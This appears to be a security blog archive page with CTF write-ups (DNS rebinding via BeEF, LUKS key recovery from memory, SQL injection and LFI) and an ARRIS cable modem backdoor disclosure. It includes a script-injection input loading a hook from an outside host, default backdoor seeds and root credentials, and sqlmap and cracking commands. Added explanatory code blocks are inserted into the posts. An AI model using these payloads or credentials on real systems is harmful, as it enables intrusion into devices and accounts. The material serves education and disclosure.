w00tsec.blogspot.com - Older Posts
w00tsec - embedded device & webapp hacking

Sunday, March 13, 2016
0CTF 2016 Write Up: Monkey (Web 4)

The Chinese 0CTF took place on March 12-13 and it was yet another fun CTF. I played with my teammates from TheGoonies and we were ranked #48. I found the Web task "Monkey" particularly interesting: I solved it with help from my friend @danilonc, but it took way longer than it should have because of some **Spoiler Alert** DNS glitches. According to the scoreboard status, approximately 35 teams were able to solve it.

Task: Monkey (Web - 4pts)
What is Same Origin Policy? you can test this problem on your local machine http://202.120.7.200

The running application receives a Proof-of-Work string and an arbitrary URL, instructing a "monkey" to scan the inputted URL for 2 minutes.

Proof-of-Work
Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars of their MD5 against the challenge. The POW challenge was more CPU-intensive than usual, so the traditional bash/python one-liner CTF scripts would require some performance improvements. @danilonc had written a quick hack in Go to bruteforce and solve the POW of older CTF challenges, so we just slightly modified it:

Solving the Proof-of-Work:

Same-Origin Policy and CORS
The Same-Origin Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same origin. If any of these three attributes varies, the resource is in a different origin. Hence, if the provided resources come from the same hostname, scheme and port, they can interact without restriction. If you try to use an XMLHttpRequest to send a request to a different origin, you can't read the response. However, the request will still arrive at its destination. This policy prevents a malicious script on one page from obtaining access to sensitive data (both the header and the body) on another web page, on a different origin.
For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like "Access-Control-Allow-Origin: *", we would be able to retrieve its data with no effort. This, of course, was not the case.

Bypassing the Same-Origin
The flag was accessible on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using BeEF, so we could fingerprint his device, platform, plugins and components. There was nothing interesting here, a custom user-agent and no known vulnerable component. We enumerated the chars accepted by the server with the following script:

Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no sign of command injection. Our evil plan to input --disable-web-security $URL to disable Chrome's SOP didn't work, so we had to find new ways to retrieve the secrets. We also thought about using data:uri and file schemes to load a malicious script/webpage, but it wouldn't help us bypass the SOP. We tried to input URLs like <html><script/**/src='http://www.example.com:8000/hook.js'></script></html> and file:///proc/self/environ (setting custom headers with a malicious HTML), but that is also known not to work on modern browsers.

DNS Rebinding
After some discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack. devttys0 presented on this class of vulnerabilities at DEFCON 18 and @mikispag recently wrote a detailed post describing how to use DNS rebinding to steal WiFi passwords. DNS rebinding is a technique that can be used to breach same-origin restrictions, enabling a malicious website to interact with a different domain. The possibility of this attack arises because the distinctions the SOP draws are based primarily on domain name and port, whereas the ultimate delivery of HTTP requests involves converting domain names into IP addresses.
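The rebinding sequence described above, and the two resolver-side mitigations that stop it, are easier to see in a small simulation. The following Python is an added example, not code from the post or from BeEF: AttackerZone, CachingResolver, GuardedResolver and simulate are names chosen here, the timeline (hook page loaded at t=0, A record flipped, same-origin fetch at t=2) is modelled on the post, and the hostname and addresses are the ones the post uses. The guard combines the two protections real resolvers offer: refusing answers that point an external name at loopback or RFC 1918 space (what dnsmasq's --stop-dns-rebind option does) and pinning the first address seen for a name for the rest of the session.

```python
import ipaddress

# Ranges an external hostname should never legitimately resolve to. This is the
# filter that resolvers with rebinding protection apply to upstream answers.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


class AttackerZone:
    """Constructed stand-in for the attacker's BIND zone: a single A record with
    a 1 second TTL that the operator flips once the victim's browser is hooked."""

    def __init__(self, name, ip, ttl=1):
        self.name, self.ip, self.ttl = name, ip, ttl

    def answer(self, name):
        if name != self.name:
            raise LookupError(name)
        return self.ip, self.ttl

    def rebind(self, new_ip):
        self.ip = new_ip


class CachingResolver:
    """Plain stub resolver: honours the TTL and re-queries once it has expired."""

    def __init__(self, zone):
        self.zone, self.cache = zone, {}

    def resolve(self, name, now):
        hit = self.cache.get(name)
        if hit and now < hit[1]:
            return hit[0]
        ip, ttl = self.zone.answer(name)
        self.cache[name] = (ip, now + ttl)
        return ip


class RebindingBlocked(Exception):
    pass


class GuardedResolver(CachingResolver):
    """Two mitigations on top of the plain resolver: reject answers that map an
    external name to an internal range, and pin the first address seen for a
    name so a TTL-driven change cannot move an origin during the session."""

    def __init__(self, zone):
        super().__init__(zone)
        self.pinned = {}

    def resolve(self, name, now):
        ip = super().resolve(name, now)
        if is_internal(ip):
            raise RebindingBlocked(f"{name} -> {ip} points at an internal range")
        return self.pinned.setdefault(name, ip)


def simulate(guarded: bool):
    """Replay the post's timeline against one resolver; returns the address each
    fetch of http://ctf.example.com:8080 used, or 'blocked'."""
    zone = AttackerZone("ctf.example.com", "1.2.3.4", ttl=1)
    resolver = (GuardedResolver if guarded else CachingResolver)(zone)
    log = []
    # t=0: the victim loads the hook page; the answer is the attacker's public IP.
    log.append(resolver.resolve("ctf.example.com", now=0))
    # The attacker flips the A record to loopback as soon as the browser is hooked.
    zone.rebind("127.0.0.1")
    # t=2: the cached answer has expired; the hooked page issues a request to its
    # own origin, which now resolves to 127.0.0.1 unless something intervenes.
    try:
        log.append(resolver.resolve("ctf.example.com", now=2))
    except RebindingBlocked:
        log.append("blocked")
    return log


if __name__ == "__main__":
    print("plain resolver:  ", simulate(guarded=False))
    print("guarded resolver:", simulate(guarded=True))
```

With the plain resolver the second fetch goes to 127.0.0.1 while the browser still considers it the origin ctf.example.com:8080, which is exactly the hole the challenge relied on; the guarded resolver raises RebindingBlocked instead. The range filter alone does nothing against a flip between two public addresses the attacker controls, and pinning alone would not matter if the first answer were already internal, so real deployments use both.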
We had some issues at first because we tried to use the free DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to hook the user's browser when using the service. To make our life miserable, the challenge monkey would scan the site for two minutes only: we also couldn't use the DNS services from Namecheap because the minimum TTL is 60 seconds.

Attack Phase
After deciding to set up the DNS server on our own, we came up with the following attack scenario:
1) The user visits the BeEF hook page at http://ctf.example.com:8080 (IP 1.2.3.4).
2) The webpage loads the BeEF javascript hook and his browser becomes a zombie.
3) We perform a DNS Rebind to change the A Record from 1.2.3.4 to 127.0.0.1. @danilonc set the BIND Zone file with a low TTL (1 sec) and replaced the record (lines 14-15) as soon as the browser got hooked.
4) Perform a CORS request using BeEF's "Test CORS Request" module.

Here's a small diagram of the attack:

After a couple of tries we finally managed to get the flag:
Flag: 0ctf{monkey_likes_banananananananaaaa}

Posted by Bernardo Rodrigues at 9:01 PM. 2 comments. Labels: beef, bypass, ctf, dns, rebinding, web

Thursday, November 19, 2015
ARRIS Cable Modem has a Backdoor in the Backdoor

A couple of months ago, some friends invited me to give a talk at NullByte Security Conference. I started to study some embedded device junk hacking hot topics and decided to talk about cable modem security. Braden Thomas keynoted at Infiltrate 2015 discussing Practical Attacks on DOCSIS so, yeah, cable modem hacking is still mainstream. On November 21st I'll be at Salvador speaking on "Hacking cable modems: The Later Years". It's not a talk about theft of service and getting free Internet access. I'll focus on the security of the cable modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything's really really bad.

Securing cable modems is more difficult than other embedded devices because, in most cases, you can't choose your own device/firmware and software updates are almost entirely controlled by your ISP. While researching the subject, I found a previously undisclosed backdoor on ARRIS cable modems, affecting many of their devices including TG862A, TG862G, DG860A. As of this writing, Shodan searches indicate that the backdoor affects over 600.000 externally accessible hosts and the vendor has not yet stated whether it's going to fix it.

ARRIS Backdoors
ARRIS SOHO-grade cable modems contain an undocumented library (libarris_password.so) that acts as a backdoor, allowing privileged logins using a custom password. The following files load the backdoor library on ARRIS TG862A Firmware TS0705125D_031115_MODEL_862_GW (released in 2015):
/usr/sbin/arris_init
/usr/sbin/dimclient
/usr/sbin/docsis_mac_manager
/usr/sbin/ggncs
/usr/sbin/gw_api
/usr/sbin/mini_cli
/usr/sbin/pacm_snmp_agent
/usr/sbin/snmp_agent_cm
/usr/www/cgi-bin/adv_pwd_cgi
/usr/www/cgi-bin/tech_support_cgi

ARRIS password of the day is a remote backdoor known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backdoor password. The default seed is MPSJKMDHAI and guess what - many ISPs won't bother changing it at all. The backdoor account can be used to enable Telnet and SSH remotely via the hidden HTTP administrative interface "http://192.168.100.1/cgi-bin/tech_support_cgi" or via custom SNMP MIBs. The default password for the SSH user 'root' is 'arris'. When you access the telnet session or authenticate over SSH, the system spawns the 'mini_cli' shell asking for the backdoor password.
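The list of binaries above that load libarris_password.so is the kind of result you get by reading the DT_NEEDED entries of every executable in the extracted firmware, which is a quick way to audit any firmware tree for users of a suspicious library. The following Python is an added example, not code from the post or from ARRIS: needed_libraries parses the program headers and dynamic section of a 32- or 64-bit ELF in either byte order (the TG862 binaries are big-endian ARM), find_library_users walks a directory tree with it, and build_fixture_elf fabricates a minimal big-endian ARM ELF32 so that demo_scan runs without any real firmware. All of these names and the fixture are constructed here.

```python
import os
import struct
import tempfile

PT_LOAD, PT_DYNAMIC = 1, 2
DT_NULL, DT_NEEDED, DT_STRTAB = 0, 1, 5
# ELF header: ident, type, machine, version, entry, phoff, shoff, flags,
# ehsize, phentsize, phnum, shentsize, shnum, shstrndx  (ELFCLASS32 / ELFCLASS64)
EHDR_FMT = {1: "16sHHIIIIIHHHHHH", 2: "16sHHIQQQIHHHHHH"}
BYTE_ORDER = {1: "<", 2: ">"}  # ELFDATA2LSB / ELFDATA2MSB


def _program_headers(data):
    """Yield (p_type, p_offset, p_vaddr, p_filesz) for each program header."""
    cls, end = data[4], BYTE_ORDER[data[5]]
    hdr = struct.unpack_from(end + EHDR_FMT[cls], data, 0)
    phoff, phentsize, phnum = hdr[5], hdr[9], hdr[10]
    for i in range(phnum):
        off = phoff + i * phentsize
        if cls == 2:  # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
            p_type, _, p_off, p_vaddr, _, p_filesz, _, _ = struct.unpack_from(end + "IIQQQQQQ", data, off)
        else:         # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
            p_type, p_off, p_vaddr, _, p_filesz, _, _, _ = struct.unpack_from(end + "IIIIIIII", data, off)
        yield p_type, p_off, p_vaddr, p_filesz


def needed_libraries(data):
    """DT_NEEDED names of an ELF image (32- or 64-bit, either byte order)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    dyn_fmt = BYTE_ORDER[data[5]] + ("qQ" if data[4] == 2 else "iI")
    segments = list(_program_headers(data))
    needed, strtab_addr = [], None
    for p_type, p_off, _, p_filesz in segments:
        if p_type != PT_DYNAMIC:
            continue
        for pos in range(p_off, p_off + p_filesz, struct.calcsize(dyn_fmt)):
            tag, val = struct.unpack_from(dyn_fmt, data, pos)
            if tag == DT_NULL:
                break
            if tag == DT_NEEDED:
                needed.append(val)
            elif tag == DT_STRTAB:
                strtab_addr = val
    if strtab_addr is None:
        return []
    # DT_STRTAB is a virtual address: map it to a file offset via the PT_LOAD holding it.
    for p_type, p_off, p_vaddr, p_filesz in segments:
        if p_type == PT_LOAD and p_vaddr <= strtab_addr < p_vaddr + p_filesz:
            strtab_off = strtab_addr - p_vaddr + p_off
            break
    else:
        raise ValueError("DT_STRTAB lies outside every PT_LOAD segment")
    names = []
    for idx in needed:
        start = strtab_off + idx
        names.append(data[start:data.index(b"\0", start)].decode("ascii"))
    return names


def find_library_users(root, libname):
    """Walk an extracted firmware tree; list files whose DT_NEEDED names libname."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    if libname in needed_libraries(fh.read()):
                        hits.append(os.path.relpath(path, root))
            except (ValueError, KeyError, OSError, struct.error, UnicodeDecodeError):
                continue  # not an ELF, unreadable or truncated: skip it
    return sorted(hits)


def build_fixture_elf(needed):
    """Constructed minimal ELF32 big-endian ARM image: one PT_LOAD mapping the
    whole file at vaddr 0 and a PT_DYNAMIC whose DT_NEEDED entries list `needed`."""
    strtab, offsets = b"\0", []
    for name in needed:
        offsets.append(len(strtab))
        strtab += name.encode() + b"\0"
    phoff, phdr_size = 52, 32
    strtab_off = phoff + 2 * phdr_size
    dyn_off = strtab_off + len(strtab)
    dyn_off += (-dyn_off) % 8  # keep the dynamic array 8-byte aligned
    dyn = b"".join(struct.pack(">iI", DT_NEEDED, o) for o in offsets)
    dyn += struct.pack(">iI", DT_STRTAB, strtab_off) + struct.pack(">iI", DT_NULL, 0)
    total = dyn_off + len(dyn)
    ident = b"\x7fELF" + bytes([1, 2, 1]) + b"\0" * 9  # class32, big-endian, version 1
    ehdr = struct.pack(">" + EHDR_FMT[1], ident, 2, 40, 1, 0, phoff, 0, 0, 52, phdr_size, 2, 0, 0, 0)
    load = struct.pack(">IIIIIIII", PT_LOAD, 0, 0, 0, total, total, 5, 0x1000)
    dynamic = struct.pack(">IIIIIIII", PT_DYNAMIC, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 6, 8)
    img = bytearray(total)
    img[0:52] = ehdr
    img[phoff:phoff + 64] = load + dynamic
    img[strtab_off:strtab_off + len(strtab)] = strtab
    img[dyn_off:dyn_off + len(dyn)] = dyn
    return bytes(img)


def demo_scan(libname="libarris_password.so"):
    """Throwaway firmware root: one binary linking libname, one that does not, one text file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr", "sbin"))
        with open(os.path.join(root, "usr", "sbin", "mini_cli"), "wb") as fh:
            fh.write(build_fixture_elf([libname, "libc.so.0"]))
        with open(os.path.join(root, "usr", "sbin", "busybox"), "wb") as fh:
            fh.write(build_fixture_elf(["libc.so.0"]))
        with open(os.path.join(root, "motd.txt"), "w") as fh:
            fh.write("not an ELF\n")
        return find_library_users(root, libname)


if __name__ == "__main__":
    print(demo_scan())
```

Point find_library_users at an unpacked root filesystem and a library name; every file that names the library in DT_NEEDED is listed with its path relative to the root, and files that are not ELF, truncated or unreadable are skipped rather than aborting the scan. The parser reads program headers rather than section headers on purpose: stripped firmware binaries sometimes ship without a section table, but the loader still needs PT_DYNAMIC, so that path is always present.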
When you log in using the password of the day, you are redirected to a restricted technician shell ('/usr/sbin/cli').

Restricted shells are ;restricted
In order to understand how the backdoor works, I built a Puma5 toolchain (ARMEB) and cross compiled some useful tools like strace, tcpdump and gdbserver. I hosted them on my Github, get them here:
- https://github.com/bmaia/cross-utils/tree/master/armeb
While analyzing the backdoor library and the restricted shells, I found an interesting piece of code in the authentication check:

Yes, they put a backdoor in the backdoor (Joel from Dlink is sure to be envious). The undocumented backdoor password is based on the last five digits of the modem's serial number. You get a full busybox shell when you log on the Telnet/SSH session using these passwords. The vendor asked not to disclose details about the password generation algorithm. I'm really relieved knowing that those evil guys from Metasploit won't be able to reverse this in a timely manner.

Vulnerability, Disclosure and Marketing
Of course, we need a logo so the media can report about this with fancy graphs and vendors can distribute customized t-shirts at Blackhat. What I like most about lcamtuf is how visionary he is. While people were still writing dumb fuzzers, he wrote AFL and performed a detailed technical analysis of Qualys' GHOST. Based on his analysis, I hired a couple of marketing specialists to find out the best way to disclose the ARRIS backdoor. What do we have here?
- Multiple backdoors allowing full remote access to ARRIS cable modems
- An access key that is generated based on the cable modem's serial number
After a careful analysis, the marketing committee advised w00tsec members to write a Keygen. In order to write a Keygen, we need a leet ascii art and a cool chiptune. The chosen font was ROYAFNT1.TDF, from the legendary artist Roy/SAC and the chiptune is Toilet Story 5, by Ghidorah.
Here's the POC (make sure you turn the sound on):

Conclusion
I reported these flaws to CERT/CC on 2015-09-13 but we didn't receive much feedback from the vendor. CERT/CC was very helpful and responsive (10/10 would disclose again!). I was asked not to release the POCs immediately so I'm going to wait for the vendor to "fix" the issue. CERT/CC set a disclosure policy of 45 days long ago. They waited for more than 65 days for them to "fix" it but ARRIS didn't remove the backdoors in a timely manner. Someone needs to update the Responsible Disclosure RFC and include a note describing that vendors shall lose disclosure points whenever they plant a backdoor on the device (ARRIS modems have a third backdoor too, check the ConsoleCowboys blog). I'm pretty sure bad guys have been exploiting flaws on these devices for some time (just search for ARRIS DNS on Twitter, for example). We need more people bypassing EULAs and reversing end-user software and firmware. If you haven't heard about Firmware.RE, check them out right now. A broader view on firmwares is not only beneficial, but necessary to discover new vulnerabilities and backdoors, correlating different device families and showing how vulnerabilities reappear across different products. To all the vendors out there, I would like to finish this post by quoting @daveitel:

Posted by Bernardo Rodrigues at 11:07 AM. 168 comments. Labels: arris, backdoor, cable modem, firmware, nullbyte, tg862

Thursday, October 22, 2015
Hack.lu 2015 CTF Write Up: Dr. Bob (Forensic 150)

Hack.lu 2015 CTF was organised by fluxfingers during October 20-22. It's one of the coolest CTFs around, the only drawback is that it runs during week days (hey guys, patch this for the next years). My team TheGoonies ranked #59th, which is not bad considering we only played part-time. The task Dr. Bob was the one I found most interesting as it included disk forensics, memory forensics and basic crypto tasks.

Task: Dr. Bob (Forensic 150)
There are elections at the moment for the representative of the students and the winner will be announced tomorrow by the head of elections Dr. Bob. The local schoolyard gang is gambling on the winner and you could really use that extra cash. Luckily, you are able to hack into the mainframe of the school and get a copy of the virtual machine that is used by Dr. Bob to store the results. The desired information is in the file /home/bob/flag.txt, easy as that. Download: dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz

The file provided is a VirtualBox image in a saved state. According to the challenge instructions, we have to retrieve the flag from the user home folder. The VM starts on a login terminal of what seems to be a Linux distro. The easiest route here is to convert the VDI image to raw, mount it and extract the key from the home folder. VirtualBox has a builtin tool to convert VDI to raw and it's as simple as:
C:\Program Files\Oracle\VirtualBox\VBoxManage.exe internalcommands converttoraw c:\ctf\home\dr_bob\.VirtualBox\Safe\Safe.vdi c:\ctf\safe.dd

Let's identify the raw image and mount it externally:
sudo fdisk -lu safe.dd
sudo losetup -o 1048576 /dev/loop0 safe.dd
sudo lvmdiskscan

There are two interesting devices: /dev/vg/root and /dev/vg/home, let's 1 - mount the home folder, 2 - grab the flag and 3 - PROFIT!!! Oh noes, the disk is encrypted... I couldn't find any useful data on the root device (/dev/vg/root). I tried to crack some local password hashes but I didn't get anything and logs/history files didn't reveal any secrets. Time to unleash some CSI skills and perform live memory forensics.

Memory Forensics: Rekall
Unlike VMware virtual machines, VirtualBox does not offer an easy-to-use memory dump (as far as I know). What do we do now? It's time to perform VM introspection with Rekall.

Memory Analysis Inception
Rekall is the first memory framework to support transparent introspection of VMs with any host-guest OS combination and is independent of the virtualization software layer.

Building the Profile
Linux support in Rekall requires a profile tailored to the running kernel as well as the System map file. The profile file contains all the debugging symbols extracted into a Rekall standard profile format. To generate this file, it is necessary to build a kernel module with debugging symbols enabled, and then parse the DWARF debugging symbols. The operating system is a Debian 7.9 i686, with 3.2.0-4-486 Kernel. The Linux guide from the Rekall repository is pretty straightforward. I downloaded a Debian 7.9 i386 ISO, installed it on a clean system, installed the Kernel headers from the target VM and built the respective profiles. I mirrored them here: https://github.com/bmaia/rekall-profiles

Memory Analysis Inception
Now that we have the proper profile, we can run VirtualBox, start the VM and perform live forensics on the guest machine. The vmscan plugin scans the physical memory attempting to find hypervisors and group them together logically as virtual machines. It's possible to run plugins on any VM by using the --ept (Extended Page Tables) parameter on the command line. To run a Rekall plugin on a VM that vmscan found, invoke Rekall as you normally would, but add --ept EPT_VALUE as a parameter.
rekal -f \\.\pmem vmscan --live
rekal.exe -f \\.\pmem --profile Debian-3.2.0-4-486.zip --ept 0x1ECC0701E

I tried to use the basic plugins that support Linux analysis, but none of them revealed the secrets necessary to decrypt the disk. After some time I decided to take a different approach: dump the full memory from the Guest VM and carve it for secrets.
imagecopy output_image='memdump.raw'

Extracting AES Keys from the Memory Dump
You can use tools like bulk_extractor and findaes to extract AES keys from memory dumps.
These programs work by scanning the images and eliminating anything which is not a valid AES key schedule.
./findaes memdump.raw

The tools found an AES-128 key, and I now needed to recreate this setup in a lab to make sure that it was the encryption master key. I set up an encrypted volume on a Debian installation and dumped the master keys using cryptsetup:
cryptsetup luksDump --dump-master-key /dev/sda5
After that, I dumped the operating system memory and used bulk_extractor to search for AES keys:
bulk_extractor memdump.raw
The AES256 key matches the MK dump, which brings us to the final step.

Decrypting the LUKS volume using the Master Key
Now that we have the AES key, all we need to do is follow this guide - Cryptsetup and the master key - and decrypt '/dev/vg/home'. There's no command-line option to decrypt the disk using the master key, everything is kind of hackish (you need to fake the headers and create a new one using the key).
sudo losetup -o 1048576 /dev/loop1 safe.dd
cryptsetup -v luksDump /dev/vg/home
The Master Key (MK) has 128 bits, which is a good sign. The payload offset is 2048 and we need to do some basic math here to get the LUKS header size: 2048 * 512 / 1024 = 1024 (fdisk -l shows that the cluster size is 512 bytes).
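The scan that findaes and bulk_extractor perform above can be reproduced in a few dozen lines. AES-128 expands a 16-byte key into a 176-byte key schedule, and because dm-crypt keeps that expanded schedule in kernel memory while the volume is open, a scanner can treat every offset as a candidate key, expand it, and keep only the offsets where the following 160 bytes are exactly that expansion. The following Python is an added example, not the post's code nor findaes itself: SBOX, expand_key_128, find_aes128_keys and make_sample_image are names chosen here, and the 8 KiB "memory dump" is constructed (deterministic noise with the post's recovered master key planted as a full schedule at one offset and as bare key bytes at another).

```python
import random


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xff


def _build_sbox():
    """Rijndael S-box from the GF(2^8) inverse plus the affine map, so the
    block carries no 256-entry table. p walks the multiplicative group by
    repeated *3, q tracks its inverse by repeated /3."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1b if p & 0x80 else 0)) & 0xff
        q = (q ^ (q << 1)) & 0xff
        q = (q ^ (q << 2)) & 0xff
        q = (q ^ (q << 4)) & 0xff
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()


def expand_key_128(key: bytes, rounds: int = 10) -> bytes:
    """FIPS-197 key expansion for AES-128: 16-byte key -> 16 * (rounds + 1) bytes."""
    if len(key) != 16:
        raise ValueError("AES-128 key must be 16 bytes")
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 4 * (rounds + 1)):
        temp = words[i - 1][:]
        if i % 4 == 0:
            temp = [SBOX[b] for b in temp[1:] + temp[:1]]  # RotWord then SubWord
            temp[0] ^= rcon
            rcon = (rcon << 1) ^ (0x11b if rcon & 0x80 else 0)
        words.append([a ^ b for a, b in zip(words[i - 4], temp)])
    return bytes(b for w in words for b in w)


def find_aes128_keys(image: bytes):
    """Slide over the image and report (offset, key_hex) wherever the 176 bytes
    starting at offset are exactly the schedule expanded from the first 16.
    A one-round precheck discards almost every offset before the full expansion."""
    hits = []
    for off in range(0, len(image) - 175):
        candidate = image[off:off + 16]
        if expand_key_128(candidate, rounds=1)[16:32] != image[off + 16:off + 32]:
            continue
        if expand_key_128(candidate) == image[off:off + 176]:
            hits.append((off, candidate.hex()))
    return hits


def make_sample_image(key_hex: str, offset: int = 3000, size: int = 8192) -> bytes:
    """Constructed 'memory dump': deterministic noise with one expanded key
    schedule planted at `offset` and a bare copy of the key at 500 as a decoy."""
    rng = random.Random(20151022)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    key = bytes.fromhex(key_hex)
    buf[offset:offset + 176] = expand_key_128(key)
    buf[500:516] = key  # key bytes without a schedule must not be reported
    return bytes(buf)


SAMPLE_KEY = "1fab015c1e3df9eac8728f65d3d16646"  # the master key recovered in the write-up
SAMPLE_IMAGE = make_sample_image(SAMPLE_KEY)

if __name__ == "__main__":
    for off, key in find_aes128_keys(SAMPLE_IMAGE):
        print(f"AES-128 key schedule at offset {off:#x}: {key}")
```

Run against a real dump the loop is the same, only the input is bigger; the one-round precheck is what keeps it affordable, since a full expansion at every byte offset of a multi-gigabyte image would be slow in pure Python. The decoy at offset 500 shows the property the technique depends on: a key merely stored in a buffer has no schedule after it and is not reported, which is why this finds keys that a cipher implementation is actively using. AES-256 keeps a 240-byte schedule expanded with an extra SubWord step every fourth word, so a scanner for 256-bit keys needs its own expansion routine rather than a longer run of this one.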
We now proceed to write a new LUKS header on the device using the extracted MK, assigning a new passphrase:
dd if=/dev/vg/home of=test.img
hexdump -C -n 80 test.img
dd if=/dev/zero of=test.img conv=notrunc bs=1024 count=1
hexdump -C -v -n 80 test.img
echo 1fab015c1e3df9eac8728f65d3d16646 | xxd -r -p > key.bin
cryptsetup luksFormat --verify-passphrase --cipher=aes-ecb --hash=sha1 --key-size=128 --master-key-file=key.bin test.img

They tried to hide the flag from "/bin/cat" using the carriage return char (0x0D), but hexdump and Pluma had no problems displaying it:
Flag: flag{v0t3_f0r_p3dr0}

Update 1: @rbaranyi and David Berard pointed out that replacing '/etc/shadow', logging in with the known password and then using 'strings /dev/lvm' would be easier. That's true, but that wouldn't involve any kind of memory inception.
Update 2: David Berard pointed out that newer 'cryptsetup' offers an option to set a new passphrase using the master key: 'cryptsetup luksAddKey --master-key-file=<master-key-file> <luks device>'
Update 3: According to the writeup from CLGT, you can also dump VirtualBox RAM using this command: 'VBoxManage debugvm SafeClone dumpvmcore --filename=getthekey'
Update 4: Some teams used the dm_dump volatility plugin: it identifies disks on the target system which were mounted using the device-mapper framework. The output of this plugin gives you the arguments to pass to the dmsetup command to remount the original unencrypted file system on a different machine.

Posted by Bernardo Rodrigues at 6:02 AM. 4 comments. Labels: aes, ctf, forensic, hacklu2015, luks, rekall

Wednesday, October 7, 2015
Mac OS X 10.11 Partial Lock Screen Bypass

Lock screen bypasses are becoming mainstream. The most notable recent bypasses are the one from Ubuntu 14.04 (hold enter, lock screen crashes, computer unlocked) and the one from Android 5.x (input large strings in the password field, destabilize the lock screen, crash to the home screen). Many respected researchers have found and published something about this class of bugs and this blog is no different: this post describes a completely useless super serious vulnerability affecting Mac OS X 10.11 and earlier.

Mac OS X 10.11 Partial Lock Screen Bypass
Mac OS X 10.11 (and probably older versions) is vulnerable to a partial lock screen bypass. This is not a *complete* lock screen bypass as you won't be able to freely interact with the Desktop (as far as I know). Here are the steps to reproduce this bug:
1 - Hit the Exposé Key (F3)
2 - Click on any window and keep holding it
3 - Keep holding the left mouse button and lock the screen using Command + Option + Eject (hold all these keys together for some time)
That's it, now the lock screen has an "extra layer" with the miniaturised desktop windows. If you move the mouse cursor over the correct application position and hit the Space Key, a larger window will be displayed. You can watch Youtube videos and interact with media players (Quicktime, Spotify etc) using the media control keys. You can't interact directly with the app: if you left-click on the windows or hit Enter, the lock screen takes over that invisible layer.

Proof-of-concept - Mac OS X 10.11:
If Youtube is blocking the video in your country, watch it here:

If you are a serious tech journalist reporting about this bug feature, don't forget to say that this is specially useful to play Youtube and Spotify playlists during parties at a friend's house. You don't want to leave your Mac logged in and unattended, so you simply preload the playlist and lock the screen using this cool technique.
Bonus: Mac OS X 10.11 Hidden Window Bug
This is yet another useless totally serious bug affecting the new Mac OS X El Capitan. You can hide an application window from the user by moving it to another display and switching the screen mirroring options. Here are the steps to reproduce this bug:
1 - Connect your monitor to an external display ("Use As Separate Display")
2 - Move the window you want to hide to the secondary display
3 - Hit the Exposé Key (F3), move the mouse cursor over the window you want to hide and hit the Space Key.
4 - Alternate the screen mirroring options by inputting Command + F1
5 - The window is gone (OMGBBQ!!!)
Proof-of-concept - Mac OS X 10.11:
I personally use this to hide all the Mac applications from coworkers who leave their computers unlocked and unattended.

Posted by Bernardo R                                    odrigues at 11:18 AM. 1 comment. Labels: apple, bypass, elcapitain, fail, lockscreen, macosx

Sunday, September 20, 2015
CSAW CTF 2015 Write Up: Weebdate (web500)

The annual CSAW CTF Qualification Round took place on September 18-20 and it was yet another really cool CTF. I played with my friends from TheGoonies and we ranked #128 overall (The Goonies 'R' Good Enough).

Task - Weebdate (web500)
Since the Ashley Madison hack, a lot of high profile socialites have scrambled to find the hottest new dating sites. Unfortunately for us, that means they're taking more safety measures and only using secure websites. We have some suspicions that Donald Trump is using a new dating site called "weebdate" and also selling cocaine to fund his presidential campaign. We need you to get both his password and his 2 factor TOTP key so we can break into his profile and investigate. Flag is md5($totpkey.$password) http://54.210.118.179/

This is a basic Flask application running a dating site. The website has some features like most web applications we are used to: creating users, editing profiles, sending messages, searching users and exposing the whole customer data through SQL Injection and LFI.

SQLi
The CSP reporting URI was vulnerable to SQL injection. SQLmap had no problems finding and exploiting it.
python sqlmap.py -u 'http://54.210.118.179:80/csp/view/1' --cookie='session=donaldtrump010_1442717300_f65cb746b519c2b49f8e938a896e08e96f5fc533' --dbms=mysql --batch
The 'weeb' database had three tables: messages, reports and users. The 'user' table had eight columns: user_id, user_name, user_password, user_ip, user_image, user_credits, user_register_time and user_profile. Passwords had a SHA256 pattern so I quickly started cracking them using John The Ripper:
john --format=raw-sha256 hash.txt --wordlist=rockyou.txt
Most cracked passwords had patterns like 'testtest', 'lablab' and 'guest1guest1'. After some time I realised that the username was used as a salt. I generated a small wordlist concatenating donaldtrump's user and password and I finally managed to crack it:

The login form displays "Invalid verification code" when you type a wrong TOTP verification code and it returns "Invalid credentials" when you mistype the password. I knew that his password was 'zebra' but I still needed to find out the TOTP algorithm in order to steal his seed.

LFI
The 'image_url' parameter from '/profile/edit' was vulnerable to LFI, displaying the full content of local files:

A curious note here is that it was the first time I managed to find a bug using Burp Collaborator. The scanner identified the external HTTP/DNS interaction and after some digging I quickly found the LFI =)

After a lot of time bruteforcing the dirs and files, we managed to find the server root:
We are particularly interested in the generate_seed() function:
- server.py
- utils.py
